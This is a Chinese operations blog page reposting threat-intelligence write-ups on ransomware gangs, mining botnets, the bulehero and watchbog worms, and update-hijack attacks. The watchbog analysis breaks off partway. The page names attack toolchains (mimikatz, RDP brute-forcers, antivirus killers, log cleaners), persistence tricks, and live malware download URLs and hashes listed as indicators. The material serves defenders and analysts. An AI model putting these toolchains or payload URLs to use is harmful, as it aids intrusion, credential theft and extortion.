资讯-ITB运维部落—http://www.itbcn.cn—ITB运维技术交流之家平台
记录工作点滴
分享运维知识

揭密黑产“暴力勒索、毁尸灭迹”一条龙工作流程及常用工具

吃肉的兔子阅读(111)评论(0)

处理勒索病毒应急响应事件的时候,会发现了一些有趣的事情,分享给大家,看看现在的勒索病毒运营团伙是如何“暴力勒索、毁尸灭迹”运作一条龙。

现在大部分的勒索病毒都没有自主传播的能力,不像之前WannaCry可以通过永恒之蓝进行自主传播,主动感染其它存在漏洞的主机,现在流行的一些勒索病毒,像GandCrab、Globelmpsoter、CrySiS等勒索病毒都是单一的加密主机,不具备自主传播能力,需要人工植入,但不同的勒索病毒会使用不同的渠道进行传播感染。

应急响应发现现在勒索病毒大多数使用RDP爆破的方式进入企业,然后再通过各种安全工具,进行内网传播,黑产的运作流程又是如何的?一般会使用哪些安全工具呢?

某个勒索病毒团伙使用的工具包(其中LOCKER.exe为勒索病毒母体压缩包),如下所示:

其它都是些什么工具呢?具体有什么用呢?下面一一来给大家进行讲解。

黑客通过RDP爆破进入企业之后,一般的企业都会安装相应的终端安全软件,首先要结束安全软件,使用的工具如下所示:

DefenderControl.exe结束Window Defender软件,如下所示:

ProcessHacker.exe结束进程,如下所示:

有些安全软件可能还有自保护,一般的进程工具无法结束进程,需要使用PCHunter.exe和PowerTool.exe这样的驱动级的工具,强制结束安全软件,如下所示:

结束进程之后,还可以使用Geek Uninstaller等软件,卸载相关的安全软件,如下所示:

结束安全软件之后,需要进行主机密码口令获取、内网扫描,爆破,横向传播等手段,使用的工具,如下所示:

使用mimikatz工具,获取主机口令密码,如下所示:

使用KPortScan3.0工具,扫描内网中的3389的机器,如下所示:

可以看到扫描到很多机器开放了3389,还会使用其它相关的扫描工具,NSScan,如下所示:

SoftPerfect Network Scanner,如下所示:

对扫描到的开放3389端口的机器,再使用NLBrute等工具,爆力破解内网3389的机器,如下所示:

破解内网机器之后,再通过CMD命令启动远程桌面连接,如下所示:

然后再次使用相同的方法进行内网感染,植入勒索病毒,加密主机文件,最后使用清除工具Loggy cleaner.exe进行“毁尸灭迹”操作,由于我对Loggy cleaner.exe工具的作用并不熟悉,对Loggy cleaner.exe进行逆向分析,如下所示:

1.获取主机操作系统语言版本,如下所示:

2.比较操作系统版本语是否为德语,如下所示:

3.如果为德语版本操作系统,则显示德语提示,如果不是德语操作系统,则显示英文提示,如下所示:

4.判断操作系统版本号,如下所示:

5.如果操作系统版本过低,则弹出MessageBox,然后退出程序,否则执行下面的清除操作,如下所示:

6.读取解密出程序的资源数据,如下所示:

7.在Temp目录下创建F888.tmp目录,然后创建相应的清除脚本Loggy cleaner.cmd,如下所示:

生成的清除脚本目录,如下所示:

脚本内容,如下所示:

8.通过CreateProcessA启动清除脚本,如下所示:

9.通过脚本清除windows最近使用项目,如下所示:

10.可以看到Windows最近使用的一些项目的目录文件全部被清理的干干净净,如下所示:

11.最后删除清除脚本,如下所示:

逆向分析之后,发现Loggy cleaner.exe主要的功能:关闭清除RDP连接、清除Windows凭证信息、清除Windows最近使用项目等。

勒索病毒运营团伙的运作流程:

1.通过RDP爆破进入企业

2.结束企业的终端软件

3.获取主机的口令密码

4.扫描内网中开放3389端口的主机

5.使用工具对3389主机进行爆破

6.通过RDP登录其它主机,感染勒索病毒,清理现场

7.本机感染勒索病毒,清理现场,防止应急响应人员溯源分析

随着虚拟货币的不断增值,针对企业的勒索攻击也越来越多,企业安全运维人员一定要做好相应的安全防护,勒索病毒无孔不入,大部分勒索现在都无法解密,以防为主……

关于勒索病毒的防护,给大家分享几个简单的方法:

1.及时给电脑打补丁,修复漏洞;

2.谨慎打开来历不明的邮件,点击其中链接或下载附件,防止网络挂马和邮件附件攻击;

3.尽量不要点击office宏运行提示,避免来自office组件的病毒感染;

4.需要的软件从正规(官网)途径下载,不要用双击方式打开.js、.vbs、.bat等后缀名的脚本文件;

对于来历不明的邮件、网址、程序、脚本等需要慎之又慎;

5.升级防病毒软件到最新的防病毒库,阻止已存在的病毒样本攻击;

6.开启Windows Update自动更新设置,定期对系统进行升级;

7.养成良好的备份习惯,对重要的数据文件定期进行非本地备份,及时使用网盘或移动硬盘备份个人重要文件;

8.更改账户密码,设置强密码,避免使用统一的密码,因为统一的密码会导致一台被攻破,多台遭殃;

9.如果业务上无需使用RDP的,建议关闭RDP。

文章宗旨在于提高企业安全运维人员的安全意识,做好勒索病毒防护工作,勿作恶,作恶必被抓……

Teamviewer疑似遭遇APT组织攻击

吃肉的兔子阅读(167)评论(0)

黑客组织APT41 ,这个组织在 HT界 比较出名,很早之前是匿名在地下交易所的,而在近年频繁出现在大众视野中,这不,刚刚又把我们常用的远程工具 TeamViewer 给黑了,深圳市网络与信息安全信息通报中心 紧急发出几份申明。

TeamViewer是一个能在任何防火墙和NAT代理的后台用于远程控制的应用程序,桌面共享和文件传输的简单且快速的解决方案。为了连接到另一台计算机,只需要在两台计算机上同时运行
TeamViewer 即可,而不需要进行安装(也可以选择安装,安装后可以设置开机运行)。该软件第一次启动在两台计算机上自动生成伙伴
ID。只需要输入你的伙伴的ID到TeamViewer,然后就会立即建立起连接。

 

不过今天有一个刷遍朋友圈的消(噩)息(耗)

有业内大佬分析:

其实Teamviewer很早就被各大黑客组织盯上了,被利用作为后门程序。早在2016年也报道出了黑客组织入侵的事件
该事件中,恶意软件启动TeamViewer后,其会获取TeamViewer窗口的用户IDleon)以及密码(vivi),并将主机名+ “|” + 用户名(well),以及固定的一串VPD开头的值(vip),构造成数据包的主要内容。

Vip这个字段的功能,在溯源分析后才发现其作用。

 

硬编码C2地址:

从抓包结果可见,与分析结果一致。

当攻击者获取到受害者的Teamviewer账号和密码后,其就会进行回连以便控制受害者电脑并进行进一步操作。

自查方式:(以TeamViewer14为例子)

1、在TeamViewer安装目录中(默认:C:\program Files(x86)\TeamViewer)  下打开TeamViewer14_Logfile文件;

2、在记事本中,点击“编辑”-“查找”,输入关键字“Writefile”(区分大小写)查看是否存在文件传输操作;

3、打开TeamViewer14_Logfile_OLD.log文件,重复步骤2操作。

    注:如果出现上面过程中发现存在相应关键字的内容,且时间节点没有进行上述操作,请立即联系信息安全管理部获取支持。

    建议公司官方提供的其他接入内网,使用RDP、SSH等方式链接远程主机,确保安全。

挖矿木马家族的战略战术及攻击方式

吃肉的兔子阅读(73)评论(0)

比特币等虚拟货币在2019年迎来了久违的大幅上涨,从最低3000美元上涨至7月份的14000美元,涨幅达300%,巨大的金钱诱惑使得更多的黑产团伙加入了恶意挖矿的行列。阿里云安全团队通过对云上僵尸网络家族的监控,发现恶意挖矿已成为黑产团伙主要的牟利方式。2019年共监控到58个成规模的挖矿木马团伙(数据截止到8月底),以累积感染量定义木马活跃度,下图/表是活跃TOP10的木马家族及简介。本文尝试从宏观角度分析、总结挖矿木马常用技术及发展趋势,以期能够给企业安全防护带来启示。
1

        家族名 简介         平台 攻击方式
ddgs 一个Go语言实现的挖矿僵尸网络,最早曝光于2017年10月。 Linux SSH、Redis爆破
MinerGuard 一个Go语言实现的挖矿僵尸网络,2019年4月开始爆发 Windows、Linux双平台 SSH、Redis、Sqlserver爆破、多种web服务漏洞(ElasticSearch、Weblogic、Spring、ThinkPHP等)
kerberods 2019年4月开始爆发的挖矿僵尸网络 Linux SSH爆破、Redis爆破、Confluence RCE等Web服务漏洞
kworkerds rootkit挖矿蠕虫,最早曝光于2018年9月 Linux、Windows双平台 ssh、redis爆破、WebLogic远程代码执行漏洞等
bulehero Windows下的挖矿蠕虫病毒,最早曝光于2018年8月 Windows 永恒之蓝漏洞、ipc$爆破以及Struts2RCE、ThinkPHP RCE等多个Web服务漏洞
CryptoSink 2019年3月开始爆发,会将其他矿池地址解析为127.0.0.1 Linux、Windows双平台 ElasticSearch未授权访问漏洞、Redis爆破
systemdMiner 2019年4月爆发,借助入侵ddgs的c&c服务器快速扩张 Linux Hadoop Yarn未授权访问漏洞、SSH密钥
watchdogs 2019年2月爆发,Linux下的挖矿蠕虫 Linux SSH爆破、Redis爆破
8220Miner 8220挖矿团伙是一个长期活跃的利用多个漏洞进行攻击和部署挖矿程序的国内团伙,最早曝光于2018年8月 Linux、Windows双平台 Hadoop Yarn未授权访问漏洞、docker未授权访问漏洞等多个web服务漏洞
ibus Perl脚本实现的挖矿蠕虫,2019年1月开始爆发 Linux ThinkPHP5 RCE、java反序列化漏洞、Weblogic WLS组件RCE漏洞、WebLogic 任意文件上传漏洞、redis 未授权访问漏洞等

核心观点

  • 木马投放方式全面蠕虫化,多种漏洞组合攻击成为趋势,N-day漏洞利用速度在加快

这种趋势无疑令人异常担忧,意味着挖矿木马的传播能力在大幅增强,变得无孔不入。一旦企业的信息系统存在任意可被利用的漏洞,那么企业内网将会快速沦陷,挖矿行为会抢占CPU资源,严重影响企业信息系统运行。这对企业的漏洞管理和安全防御能力有了更高、更快的要求。

  • 木马持久化技术被成熟利用,rootkit、无文件技术成为趋势

挖矿木马入侵成功后必定希望能够长久稳定的挖掘出虚拟货币,其技术上使用rootkit、无文件等技术实现长期、隐蔽运行。对于一般的运维人员,系统一旦中招后,顽固木马是难以清除的,这需要企业具备更专业的安全应急响应能力。

  • 木马开始出现跨平台趋势

Golang语言天生具备跨平台编译能力,这个特点方便黑产团伙在多平台间移植,新出现的恶意软件使用GO也成为了一种趋势。TOP10中有6个是2019年爆发的挖矿木马,其中有5个是GO语言实现的,MinerGuard和kworkerds已具备了Linux/Windows双平台传播的能力。

工欲善,利其器-攻击之术

全网漏洞扫描/投放->蠕虫化投放

1、利用单一或多个IP攻击全网漏洞进行投放
这种投放方式较为原始,无横向传播能力,效率比较低下,且容易被防御拦截。在我们的监控中,使用这种方式的木马规模普遍较小。例如:8220Miner固定使用多个国外IP进行持续攻击,会定期更换IP,但更换频率较低。而ddsMiner通过sqlserver入侵,攻击载荷会下载名为dds.exe的PE文件(如:http://113[.]69[.]206[.]219:4523/dds.exe),该团伙每天至少使用1个新的IP进行全网攻击,攻击时间持续数小时,该IP也是当天的恶意文件托管站。
2、蠕虫化投放
蠕虫化的挖矿botnet具备攻击模块,扫描并感染网络上的其他服务器,使用这种方式进行传播会按照指数增长的速度扩张,且这种方式会使得溯源和防御变得更加困难。TOP10中2019年爆发的几个挖矿botnet全部使用蠕虫化投放方式,他们都是在短时间内(几天时间)得到快速扩张跻身TOP10。

单一漏洞利用->组合漏洞横向传播

早期的挖矿木马使用固定漏洞在公网传播,传播速度和规模受限。而使用多种漏洞组合攻击的方式使得挖矿木马具备了内网横向传播的能力,攻击模块会集成通用的WEB服务漏洞、爆破、数据库漏洞等攻击方式。‘聪明’的挖矿木马作者更是使用不同的内外网攻击策略,进行更高效的传播。例如:Windows平台下的Bulehero挖矿木马,在内网优先使用永恒之蓝漏洞、ipc$爆破、RDP爆破进行传播,在公网则优先使用Web服务漏洞进行传播。Linux平台下的kerberods挖矿木马,在内网优先使用本地ssh key、ssh爆破进行传播。在这种高效策略下,企业内网通常在几分钟内被全部入侵。

N-day漏洞快速利用

互联网大规模存在且未被修复的通用漏洞往往成为挖矿僵尸网络争夺的’肥肉’,N-day漏洞爆发后难以在短时间内得到有效修复,’嗅觉’灵敏的黑产团伙会很快纳入挖矿木马的武器库。据我们观察,N-day漏洞留给运维人员进行修复的空窗期越来越短,如Jboss反序列化漏洞于2017年5月被发现,年底JbossMiner开始对其大规模利用。2018年12月ThinkPhp远程代码执行漏洞爆发,十几天后被BuleHero团伙利用进行。2019年4月8日Confluence RCE 漏洞利用POC发布,4月10日就kererods蠕虫就开始利用该漏洞大肆传播,中间只隔了短短两天。再次对云平台及用户的快速响应能力构成严峻考验。

通往财富之路-牟利之术

矿池配置方式:

挖矿木马植入开源挖矿程序进行挖矿,矿机程序启动时通过命令行传入挖矿参数,但是这种方式较为原始,释放出的木马无法修改配置参数。第二种方式使用配置文件下发,结合定时任务实现对挖矿参数的控制,这种使用方式较为常见。以上两种方式都存在易被检测的特点,有些黑产团伙会对开源挖矿程序进行二次开发,将矿机配置参数硬编码在恶意程序中,并进行加壳对抗检测,以达到隐蔽挖矿的目的。

  • 挖矿程序命令行配置

2

  • 通过配置文件:

MinerGuard矿机配置文件截图!1

  • 挖矿软件硬编码配置

ddgs硬编码的矿池及钱包地址
1

挖矿方式:公共矿池->矿池代理

1、公共矿池方式
使用匿名的公共矿池是恶意挖矿最常见的方式,使用方法简单,但是由于需要配置独立的钱包地址,因此易被跟踪溯源,而且对bot挖矿无管理能力。

  • 如下图是在公共矿池上查询8220Miner的钱包地址及算力,目前该地址挖掘到15.5个门罗币,可借此估算出该挖矿僵尸网络的规模。
    1

2、矿池代理
有些挖矿僵尸网络会自己搭建矿池代理,通过代理可降低挖矿难度,也可根据收益随时切换高收益矿池、高收益矿币种,这种方式无法通过钱包地址进行跟踪。

  • 下图是监控到masscanMiner使用了矿池代理进行挖矿,通过进程cmdline可知矿池开放在121.42.151.137的28850端口,这并非一公共矿池常用的端口,登陆账号也为默认账号。
    1

其他变现方式:附带DDos、Socks代理

除了挖矿这种本职工作,有些黑产团伙会顺带通过其他方式进行变现,比如DDos、代理等。如下图是sicMiner恶意样本会运行一个python脚本,该脚本是github上开源的socks5代理,代理运行在7081端口,该团伙可能是通过出售代理进行变现。
1

生存还是毁灭-持久化之术

挖矿木马入侵成功后需要长期驻留于目标操作系统,以达到长期稳定地产出虚拟货币,通常会使用各种技术对抗安全检测和运维人员的清除。

清除/卸载安全软件

卸载宿主机的安全防护软件是常规操作,由于挖矿的攻击行为多针对服务器,黑产团伙也特别针对云环境的安全软件精准对抗。如下是kworderds蠕虫在windows、Linux下卸载不同安全软件的行为。

  • kworkerds关闭杀毒软件
    1
  • kworkerds挖矿蠕虫卸载安骑士等安全工具
    1

rootkit技术

1、通过定时任务/计划任务实现常驻
Linux下的crontab定时任务是很多恶意软件常见的驻留方式,他们并不仅仅会把自己写入用户的crontab,还会写入软件包的crontab,如/etc/cron.d,这样使得自己更不容易被发现。而Windows下则通过计划任务、修改注册表实现类似的驻留方式。如下是ddgs蠕虫恶意进程行为通过crondtab启动。

2、动态链接库预加载型rootkit
Linux下的动态链接库预加载机制在加载其他常规系统库之前就会预先加载用户定义的动态链接库,如果自定义库的函数与系统库中找到的函数具有相同的名称,自定义动态链接库就会覆盖系统库中的函数。攻击者通过动态连接库预加载,实现对libc中诸如readdir等常用函数的hook,当ps、top等shell指令尝试读取/proc/目录获取进程信息时对恶意进行隐藏。

  • 如下图是8220miner使用该技术劫持linux动态链接库配置文件/etc/ld.so.preload。
    1

无文件攻击技术

无文件攻击不需要将恶意软件落地到磁盘,因此难以被杀软查杀,具备更好的隐蔽性。在挖矿僵尸网络中通常使用各种工具(比如Windows的WMI命令行工具wmic.exe)或者脚本编程语言(如PowerShell)提供的API接口访问WMI,来实现无文件攻击。如下是TheHidden使用wmic、WannaMine使用powershell进行无文件攻击。

  • TheHidden使用wmic无文件攻击的代码片段
    1
  • WannaMine的恶意进程使用powershell隐藏、编码功能进行无文件攻击
    1

文件名/路径混淆

除了对抗各种安全工具,还要对抗运维人员的手动排查,将文件名和路径进行混淆也是常用的手段。比如ibus会将恶意文件写入多个系统目录下,并且通过随机变更大小写等方式生成和隐藏目录下文件名类似的混淆文件名。

  • ibus生成在系统目录下的混淆目录
    1
  • ibus生成混淆文件名
    1

c&c通信

由于恶意挖矿行为不需要对bot进行强控制,大部分的挖矿木马都不具备完备的c&c控制模块,他们通常使用配置文件结合定时任务,实现对bot的配置变更和版本更新。在TOP10中只有ddgs和ibus有完备的c&c控制功能。如ddgs,它的c&c通信使用uMsg序列化,能够实现攻击指令下发、版本配置更新等功能,在今年1月份的更新中甚至开始使用P2P进行c&c控制IP的下发。

  • ddgs反序列化后的c&c控制指令
    1
  • ibus的c&c控制模块的恶意代码
    1

暗网

从2018年底开始挖矿木马开始频繁使用暗网进行恶意文件托管,由于其匿名通信的特点开始在恶意软件中逐渐流行。如下是watchbog蠕虫使用暗网地址下载恶意文件

  • watchbog蠕虫使用暗网地址下载恶意文件。
    1

文件类型伪装

为了防止被追踪溯源,黑客喜欢将恶意文件托管在公开的免费网站上,他们需要将恶意shell、二进制文件伪装成图片以防止被检测。

  • 将二进制/shell文件伪装成图片文件是常规操作
    1

后门账号

除了常规驻留操作,我们监控到多个挖矿木马会在宿主机上留下后门账号,即使木马被清除掉,黑客也能通过后门账号再次入侵。

  • TheHidden添加后门账号,账号名admin,并对该账号进行了隐藏。
    1
  • watchdog添加后门ssh key
    1

人在江湖飘怎能不挨刀-资源竞争之术

除了和安全软件的对抗,挖矿僵尸网络还要面临同行的竞争,毕竟CPU资源是有限的,一机不容二’马’!

杀死竞争进程

这几乎是挖矿木马的常规操作,通过进程的指纹库判断其他挖矿进程,或者直接杀死CPU占用率高的进程。

  • kerberods进行资源竞争的进程指纹库
    1

修改防火墙

修改防火墙的iptables,将存在漏洞的服务端口关闭防止其他挖矿木马入侵。或者关闭常见的矿池端口,阻断竞争对手的挖矿行为。

  • 修改iptables配置进行资源竞争
    1

修改hosts

通过修改/etc/hosts将竞争对手的域名、常见矿池域名sinkhole,也是一种资源竞争手段。我们也见到了对应的反制措施:判断/etc/hosts是否被修改过,并重写/etc/hosts进行覆盖。

  • 将竞争对手的域名sinkhole
    1
  • kthrotldsPretender的反制措施:重写hosts
    1

借助其他botnet

除了以上常规的竞争手段外,借助其他僵尸网络进行传播也是一种高明的手段。systemdMiner在今年4月份就曾’借鸡下蛋’,通过入侵ddgs的c&c中控主机进行快速扩张。

  • systemdMiner利用ddgs的中控下发的shell
    1

防护建议

1.企业需要对漏洞进行管理并及时修复,否则容易成为挖矿木马的受害者。
2.建议使用阿里云安全的下一代云防火墙产品,其阻断恶意外联、能够配置智能策略的功能,能够有效帮助防御入侵。哪怕攻击者在主机上的隐藏手段再高明,下载、挖矿、反弹shell这些操作,都需要进行恶意外联;云防火墙的拦截将彻底阻断攻击链。此外,用户还可以通过自定义策略,直接屏蔽恶意网站,达到阻断入侵的目的。此外,云防火墙独有的虚拟补丁功能,能够帮助客户更灵活、更“无感”地阻断攻击。
3.对于有更高定制化要求的用户,可以考虑使用阿里云安全管家服务。购买服务后将有经验丰富的安全专家提供咨询服务,定制适合您的方案,帮助加固系统,预防入侵。入侵事件发生后,也可介入直接协助入侵后的清理、事件溯源等,适合有较高安全需求的用户,或未雇佣安全工程师,但希望保障系统安全的企业。

升级漏洞被攻击者“青睐” 阿里旺旺被利用进行病毒投放

吃肉的兔子阅读(120)评论(0)

近日,火绒安全团队在用户现场截获一起利用阿里旺旺升级漏洞,通过HTTP劫持植入病毒的攻击事件,攻击者可利用该漏洞下发任意代码。截止到目前,从阿里官方下载的阿里旺旺新、旧两个版本(买家版)均存在此漏洞。

经过技术分析,火绒工程师基本排除本地劫持和路由器劫持的可能性,不排除运营商劫持的可能。具体劫持技术分析尚在跟进,火绒安全团队也会对此次攻击事件进行跟踪分析。

火绒工程师表示,该漏洞的利用需要一定前提条件(通过HTTP劫持进行),所以用户也不需要过分担心,但为避免该漏洞被更大范围利用,火绒不便公开透露漏洞相关细节,只会向阿里相关技术部门提供详细漏洞分析内容。

值得强调的是,这是继不久前QQ升级程序被发现存在漏洞事件后,再次出现厂商软件因升级漏洞被劫持并植入病毒事件,巧合的是,两者被植入的病毒也有极高的同源性,推测为同一病毒团伙所为。

相关报告:腾讯QQ升级程序存在漏洞 被利用植入后门病毒

附:【分析报告】

近日,火绒安全团队在用户现场截获一起利用阿里旺旺升级漏洞,通过HTTP劫持植入病毒的攻击事件,攻击者可利用该漏洞下发任意代码。截止到目前,从阿里官方下载的阿里旺旺新、旧两个版本(买家版)均存在此漏洞。

火绒在被劫持现场中发现,阿里旺旺升级程序在发送升级请求后,会将被投放的病毒动态库当作合法程序模块加载执行。通过分析发现,该事件与之前火绒披露的利用QQ升级模块投毒的攻击手段极为相似。我们在实验室还原了漏洞利用环境,为避免该漏洞被广泛利用,火绒不会公开披露相关漏洞细节。复现环境现场,如下图所示:

此次投放的后门病毒与不久前QQ升级程序被利用所投放的后门病毒具有极高同源性,相关同源代码,如下图所示:

解密代码Key相同

解密代码逻辑相同

另外,主要病毒逻辑也大体相同:

1. 从资源节解密加载远控核心模块,相关代码如下图所示:

解密加载核心模块

2.   获取用户系统相关信息,相关代码如下图所示:

获取用户系统

3.   执行远程命令,相关代码如下图所示:

执行远程命令

 

蠕虫病毒bulehero再次利用“永恒之蓝”在企业内网攻击传播

吃肉的兔子阅读(92)评论(0)

近日,腾讯御见威胁情报中心感知多起服务器被入侵挖矿事件,分析发现bulehero挖矿木马不光使用弱口令爆破并且利用多个服务器组件漏洞进行攻击。

1.png

bulehero蠕虫病毒有以下特点:

1. 病毒下载器进程名为scvsots.exe,与系统正常进程名Svchost.exe相仿;

2. 释放网络扫描工具,在局域网内探测可以攻击传播的IP地址段;

3. 关闭Windows防火墙;

4. 利用“永恒之蓝”漏洞攻击包,及多个服务器组件相关漏洞(Struts2漏洞、Weblogic漏洞)在局域网内攻击传播;

5. 创建开机启动项;

6. 利用弱密码字典,在局域网内进行SQL Server1433端口爆破和IPC$远程连接爆破攻击。

截止目前,从该病毒使用的其中一个钱包地址看,已挖到门罗币42个(折合人民币2.1万元),腾讯御点终端安全管理系统与腾讯电脑管家均可拦截该病毒。

0×2 样本分析

Download.exe:

该样本作为下载器,继续下载scvsots.exe。

2.png

Scvsots.exe:

Scvsots.exe会先去下载Cfg.ini文件,Cfg.ini文件中存放着download.exe(下载器)的URL地址,当前版本号,以及矿池和钱包信息。

3.png

(下载的Cfg.ini)

获取成功后则释放多个文件,包括矿机和部分漏洞利用。并且创建注册表和任务自启,关闭防火墙。

4.png

挖矿分析:

释放矿机taskmgr.exe到 C:\Windows\Temp\Networks 文件夹下,计划启动进行挖矿。

5.png

6.png

(taskmgr.exe矿机)

漏洞分析:

Scvsots.exe会释放S扫描器到C:\Windows\InfusedAppe\Priess文件夹下,获取本地ip段,并随机生成部分ip段,写入文件夹下的ip.txt。

7.png

8.png

(ip.txt)

“永恒之蓝”

“永恒之蓝”自从被黑客组织公开后,被WannaCry等多种恶意病毒使用,虽然大多数用户已经修复了此漏洞,但是还有一部分未修复漏洞的用户面临被攻击的危险。

NSA利用工具包释放在 C:\Windows\InfusedAppe\UnattendGC 和 C:\Windows\InfusedAppe\LocalService 目录下。

9.png

(NSA“永恒之蓝”漏洞攻击工具包)

10.png

(payload AppCapture_x32.dll)

Struts2漏洞:S2-045(CVE-2017-5638)

Apache Struts是一套用于创建企业级Java Web 应用的开源MVC框架 。 该漏洞是由于当content-type中出现”multipart/form_data”时,会被认为有文件上传,从而调用struts2默认的上传文件组件Jakarta,通过组件漏洞载入OGNL代码并执行,从而达到远程调用的目的。

根据之前Cfg.ini中download.exe的下载地址结合payload进行入侵。

11.png

(S2-045 漏洞利用代码)

Weblogic漏洞:CVE-2017-10271

Oracle WebLogic Server是美国甲骨文(Oracle)公司的一款适用于云环境和传统环境的应用服务器组件。

漏洞引发的原因是Weblogic“wls-wsat”组件在反序列化操作时使用了Oracle官方的JDK组件中“XMLDecoder”类进行XML反序列化操作引发了代码执行,远程攻击者利用该漏洞通过发送精心构造好的HTTPXML数据包请求,直接在目标服务器执行Java代码或操作系统命令。

12.png

(CVE-2017-10271 漏洞利用代码)

Mssql 1433端口爆破

1433端口SQL Server默认端口,用于供SQL Server对外提供服务。黑客们利用sa弱口令,通过密码字典进行猜解爆破登录。爆破工具释放在C:\Windows\InfusedAppe\Basebrd 文件夹下,通过对sa弱密码进行爆破。

13.png

14.png

(pass.txt文件部分密码)

ipc$远程连接爆破

PSEXEC工具原理是通过ipc$连接,然后释放psexesvc.exe到目标机器。通过服务管理SCManager远程创建psexecsvc服务,并启动服务。客户端连接执行命令,服务端启动相应的程序并执行回显数据。

psExec释放在C:\Windows\InfusedAppe\Corporate 目录下,利用内置密码字典进行IPC$远程爆破。

15.png

(psExec admin$远程爆破)

0×3 关联分析

查询钱包收益(这是病毒正在使用的一个钱包,尚有其它钱包在追踪中)

16.png

受感染地域分布

17.png

0×4 安全建议

腾讯御见威胁情报中心提醒用户注意以下几点:

1.使用安全的密码策略 ,服务器使用高强度密码,切勿使用弱口令,特别是sa账号密码,防止黑客暴力破解。

2.修改SQL Server服务默认端口,在原始配置基础上更改默认1433端口设置,并且设置访问规则,拒绝1433端口探测。

3.推荐企业用户使用御点终端安全管理系统(下载地址:https://s.tencent.com/product/yd/index.html),个人用户使用腾讯电脑管家,及时修复系统高危漏洞,拦截可能的病毒攻击。

附录(IOCs):

URL:

http://a47.bulehero.in/

http://a46.bulehero.in/download.exe

http://a88.heroherohero.info:57890/Cfg.ini

http://a88.bulehero.in:57890/Cfg.ini

http://a46.bulehero.in/scvsots.exe

http://a46.bulehero.in/wlanexts.exe

http://a46.bulehero.in/downloader.exe

http://a46.bulehero.in/appveif.exe

MD5:

7ee0baaa13bef260d61af56f5d37bbde

02b7c84597e43dbcd94be58b046c3961

048d757ec1b33c9f08fb5c7b00cd2cba

20425a46458966175f88581b819c35ac

c64f0888ac169ef64efc3494a903445f

9e1b0b43df819cc42a34920183e19f92

622470a4c3bdf52c2f7da006a6327ace

威胁预警 | watchbog挖矿蠕虫升级,利用Bluekeep RDP等多个漏洞蓄势待发

吃肉的兔子阅读(216)评论(0)

概述

近日,阿里云安全团队监测到watchbog挖矿蠕虫的变种。该蠕虫在原先挖矿功能与C&C通信的基础上[1],增加了使用多个CVE漏洞进行传播的能力,利用这些漏洞,攻击者可以执行任意指令非法牟利或以此为跳板扩大攻击范围,对被入侵主机带来极大的安全隐患。

本文重点关注watchbog蠕虫新增加的5种漏洞利用方式,涉及的组件根据shodan与Zoomeye扫描全网量从大到小分别为:Exim、Windows Remote Desktop、CouchDB、Jira、Solr。其中运行Exim服务的设备达百万级别,而最少的Solr也有上万台设备运行,因此该蠕虫攻击覆盖面极广,提醒用户及时关注自身设备运行状态。

其中Windows Bluekeep RDP | CVE-2019-0708需要特别注意,其危害程度与2017年WannaCry所使用的”永恒之蓝”漏洞相当,虽然该蠕虫只具备对此漏洞的扫描检测能力,但近日关于此漏洞的RCE利用已有更多的细节放出,且美国Immunity公司已公开售卖其getshell利用方式,大规模爆发即将到来,提醒用户及时关注。

本文在后续的内容中,对该蠕虫相关攻击模块做了简单的分析,并介绍了阿里云安全团队对恶意流量的捕获情况。根据监测,此蠕虫还未大范围传播,且部分攻击流量具有间断性与聚集性的特点,疑似攻击团伙还在小范围尝试。但由于恶意程序本身具备多个漏洞攻击能力,阿里云安全团队建议用户参考文末的安全建议,及时对自身机器进行检查并修复相关漏洞,以防蠕虫大规模爆发。

蠕虫主要结构与特点

阿里云安全团队对该蠕虫进行了追踪与详细分析,此蠕虫的主要特点包括:

  • 脚本、挖矿进程名natstat与watchbog具有迷惑性,与Linux自带程序相似或相同;
  • C&C模块使用python编写,其余脚本通过shell实现;
  • 内置多种高危远程代码执行payload,并以此进行传播扩散,攻击面极广;
  • 通过门罗币挖矿牟利。

攻击者通过多个远程代码执行漏洞进行全网扫描,向目标发送恶意指令。指令成功执行后,被入侵主机会向https://pastebin.com/raw/yS3fAEBN发送请求下载恶意二进制程序并运行。此恶意程序由挖矿模块与攻击模块组成:
挖矿模块下载挖矿脚本、挖矿配置文件并维持C&C通信;

  • 攻击模块进行漏洞探测、payload组装与漏洞利用,并对其他主机进行攻击;
  • 攻击者整个攻击流程如下图所示:

1_

蠕虫分析

阿里云安全团队监测到该蠕虫入侵的主机执行了以下的恶意脚本:

2_

其下载base64编码的恶意脚本,解码并执行:

3_jpeg

可以看到,该程序将从恶意服务器pay_url处下载恶意程序并以natstat运行,运行后清理相关痕迹。进一步跟进后发现该蠕虫从https://pastebin.com/raw/CfpAvqzT处下载恶意二进制程序。经逆向分析,该程序向https://pastebin.com/raw/Dj3JTtnj发送请求下载恶意程序至/tmp/baby,此脚本用于挖矿与C&C通信模块,虽然与之前捕获的脚本[1]内容不尽相同,但程序核心不变,在这里不做过多介绍。

继续分析此恶意程序可以发现,该蠕虫使用名为jail的工具包,该工具包包含各种漏洞的检测、验证、payload生成等功能,可以看到其背后的攻击团伙具有较高的专业性。

4_

继续分析恶意程序可以发现,该程序利用多个CVE漏洞进行传播,除了之前在挖矿程序中常用的redis(CVE-2015-4335/写入crontab任务)、Jenkins RCE(CVE-2018-1000861)、Nexus RCE(CVE-2019-7238)漏洞之外,该恶意程序升级了攻击库,新增了JIRA RCE(CVE-2019-11581)、Exim RCE(CVE-2019-10149)、Couchdb RCE(CVE-2018-8007)、Solr RCE(CVE-2017-12629)以及Windows Remote Desktop RCE(CVE-2019-0708)作为新的传播途径。

5_

1. Windows RDP RCE [CVE-2019-0708]

Windows bluekeep是微软在2019年5月公布的安全漏洞[2],其存在于远程桌面服务中,攻击者可以通过RDP协议向开启了远程桌面服务的目标发送恶意数据,从而达到任意命令执行的效果。该漏洞在官方的描述中其危害程度与2017年WannaCry所使用的”永恒之蓝”漏洞相当,因此需格外注意。

目前,针对此漏洞还未有公开的RCE利用方式流出,只有Macfee公布了一段成功执行命令的视频,以及公开的漏洞扫描验证脚本以及蓝屏exp。但近日,该漏洞又有更多细节被安全研究者揭露,而且出售商业化渗透测试套件的美国Immunity公司在twitter上公开售卖该漏洞的getshell脚本[3],一场可以预期的大规模爆发即将到来。

该蠕虫以zerosum0x0编写的RDP扫描检测脚本为基础,构建了该漏洞的探测模块,如下图所示:

6_jpeg

此攻击模块在RDP协议连接建立时,使用了watchbog作为其标识符,即Cookie: mstshash=watchbog,可以视为其明显特征。该蠕虫在完成此扫描过程后,将探测到的存在漏洞主机地址使用RC4加密方式返回给C&C服务器,如下图所示:

7_jpeg

